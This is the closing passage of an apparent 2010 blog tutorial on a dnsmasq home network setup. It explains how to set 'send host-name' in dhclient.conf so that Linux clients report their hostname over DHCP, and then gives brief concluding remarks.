For most other Linux distributions, you can often edit dhclient.conf (usually in /etc/ or /etc/dhclient/) to include:

 send host-name "centos-5-amd64";

Or, with a recent dhclient,

 send host-name "<hostname>";

will make it look up the machine’s actual hostname.

Conclusions

That’s all there is to it. This is a pretty simple setup, but hopefully someone else will find this useful. If you need dnsmasq to do something more subtle, the documentation is mostly quite good.

Oct 24th, 2010